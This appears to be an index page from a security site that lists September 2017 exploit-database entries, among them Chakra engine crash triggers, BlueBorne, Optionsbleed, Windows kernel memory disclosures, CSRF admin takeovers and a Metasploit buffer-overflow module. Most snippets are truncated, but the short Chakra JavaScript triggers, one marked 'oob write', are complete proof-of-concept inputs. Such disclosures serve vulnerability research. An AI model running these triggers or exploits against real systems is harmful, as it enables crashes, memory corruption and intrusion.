Microsoft Edge Chakra - 'Parser::ParseCatch' does not Handle 'eval'
  Date: 2017-09-22 16:02:00 Views: 4 Comments: 0
function f() { { let i; function g() { i; } try { throw 1; } catch ({e = eval('dd')}) { } }} f();
Microsoft Edge Chakra - Deferred Parsing Makes Wrong Scopes
  Date: 2017-09-22 16:01:23 Views: 3 Comments: 0
let h = function f(a0 = (function () { a0; a1; a2; a3; a4; a5; a6; a7 = 0x99999; // oob write with ({});})(), a1, a2, a3, a4, a5, a6, a7) { function g() { f; }}; for (let i = 0; i
Microsoft Edge - Chakra Incorrectly Parses Object Patterns
  Date: 2017-09-22 16:00:41 Views: 4 Comments: 0
function f() { ({ a: { b = 0x1111, c = 0x2222, }.c = 0x3333 } = {});} f();
Linux Kernel <= 4.13.1 - BlueTooth Buffer Overflow (PoC)
  Date: 2017-09-22 15:59:15 Views: 6 Comments: 0
# Exploit Title: BlueBorne - Proof of Concept - Unarmed/Unweaponized -DoS (Crash) only# Date: 09/21/2017# Exploit Author: Marcin Kozlowski # Version: Kernel version v3.3-rc1, and thus affects all version from there on# Tested on: Linux 4.4.0-93-gener
Disk Pulse Enterprise 9.9.16 GET Buffer Overflow
  Date: 2017-09-21 16:45:14 Views: 4 Comments: 0
### This module requires Metasploit: http://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule 'Disk Pulse Enterprise GET Buffer Overflow', 'Description' => %q( This module exploits an SEH
Microsoft Edge 38.14393.1066.0 - 'COptionsCollectionCacheItem::GetAt' Out-of-Bou
  Date: 2017-09-20 15:22:30 Views: 6 Comments: 0
Microsoft Edge 38.14393.1066.0 - 'COptionsCollectionCacheItem::GetAt' Out-of-Bounds Read
HPE < 7.2 - Java Deserialization
  Date: 2017-09-20 15:19:27 Views: 3 Comments: 0
#!/usr/bin/env python######################################################################################################### # HPE/H3C IMC - Java Deserialization Exploit## Version 0.1# Tested on Windows Server 2008 R2# NameHPE/H3C IMC (Intelligent
Apache - HTTP OPTIONS Memory Leak
  Date: 2017-09-19 16:15:09 Views: 17 Comments: 0
#!/usr/bin/env python3 # Optionsbleed proof of concept test# by Hanno Böck import argparseimport urllib3import re def test_bleed(url, args): r = pool.request('OPTIONS', url) try: allow = str(r.headers["Allow"]) except KeyError: return False if allow i
Microsoft Windows Kernel - 'win32k!NtQueryCompositionSurfaceBinding' Stack Memor
  Date: 2017-09-19 16:14:22 Views: 6 Comments: 0
/*Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1307 We have discovered that the win32k!NtQueryCompositionSurfaceBinding system call discloses portions of uninitialized kernel stack memory to user-mode clients, as tested on Window
Microsoft Windows Kernel - 'win32k!NtGdiDoBanding' Stack Memory Disclosure
  Date: 2017-09-19 16:13:22 Views: 2 Comments: 0
/*Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1304 We have discovered that the win32k!NtGdiDoBanding system call discloses portions of uninitialized kernel stack memory to user-mode clients. More specifically, exactly 8 bytes of
Microsoft Windows Kernel - 'win32k!NtGdiEngCreatePalette' Stack Memory Disclos
  Date: 2017-09-19 16:12:37 Views: 2 Comments: 0
Microsoft Windows Kernel - 'win32k!NtGdiGetFontResourceInfoInternalW' Stack Memo
  Date: 2017-09-19 16:11:59 Views: 2 Comments: 0
/*Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1275 We have discovered that the nt!NtGdiGetFontResourceInfoInternalW system call discloses portions of uninitialized kernel stack memory to user-mode clients. This is caused by the
Microsoft Windows Kernel - 'nt!NtSetIoCompletion / nt!NtRemoveIoCompletion' Pool
  Date: 2017-09-19 16:10:56 Views: 2 Comments: 0
/*Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1269 We have discovered that the nt!NtRemoveIoCompletion system call handler discloses 4 bytes of uninitialized pool memory to user-mode clients on 64-bit platforms. The bug manifest
Microsoft Windows Kernel - 'win32k!NtGdiGetPhysicalMonitorDescription' Stack Mem
  Date: 2017-09-19 16:06:10 Views: 2 Comments: 0
/*Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1268 We have discovered that the nt!NtGdiGetPhysicalMonitorDescription system call discloses portions of uninitialized kernel stack memory to user-mode clients, on Windows 7 to Windo
Microsoft Windows Kernel - 'win32k!NtGdiGetGlyphOutline' Pool Memory Disclosure
  Date: 2017-09-19 16:05:28 Views: 5 Comments: 0
/*Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1267 CODE XREF: NtGdiGetGlyphOutline(x,x,x,x,x,x,x,x)+5D.text:0018DD88 push ebx ; size_t.text:0018DD89 push 0 ; int.text:0018DD8B push esi ; void *.text:0018DD8C call _memset--- cut
DigiAffiliate 1.4 - Cross-Site Request Forgery (Update Admin)
  Date: 2017-09-19 16:04:16 Views: 1 Comments: 0
#!/usr/local/bin/python# # # # # # Exploit Title: DigiAffiliate 1.4 - Cross-Site Request Forgery (Update Admin)# Dork: N/A# Date: 18.09.2017# Vendor Homepage: http://www.digiappz.com/# Software Link: http://www.digiappz.com/digiaffiliate.asp?id=7# De
Digileave 1.2 - Cross-Site Request Forgery (Update Admin)
  Date: 2017-09-19 16:03:21 Views: 2 Comments: 0
#!/usr/local/bin/python# # # # # # Exploit Title: Digileave 1.2 - Cross-Site Request Forgery (Update User & Admin)# Dork: N/A# Date: 18.09.2017# Vendor Homepage: http://www.digiappz.com/# Software Link: http://www.digiappz.com/digileave.asp?id=1# Dem
Digirez 3.4 - Cross-Site Request Forgery (Update Admin)
  Date: 2017-09-19 16:02:07 Views: 1 Comments: 0
#!/usr/local/bin/python# # # # # # Exploit Title: Digirez 3.4 - Cross-Site Request Forgery (Update User & Admin)# Dork: N/A# Date: 18.09.2017# Vendor Homepage: http://www.digiappz.com/# Software Link: http://www.digiappz.com/index.asp# Demo: http://w
Netdecision 5.8.2 - Local Privilege Escalation
  Date: 2017-09-18 14:59:44 Views: 7 Comments: 0
/*# Exploit Title: Netdecision 5.8.2 - Local Privilege Escalation - Winring0x32.sys# Date: 2017.09.17# Exploit Author: Peter Baris# Vendor Homepage: www.netmechanica.com# Software Link: http://www.netmechanica.com/downloads/ //registration required#
D-Link DIR8xx Routers - Local Firmware Upload
  Date: 2017-09-18 14:59:05 Views: 4 Comments: 0
#!/bin/bash # If you have access to an ethernet port you can upload custom firmware to a device because system recovery service is started and available for a few seconds after restart.# E-DB Note: https://embedi.com/blog/enlarge-your-botnet-top-d-li
CopyRight © 2002-2017 VFocuS.Net All Rights Reserved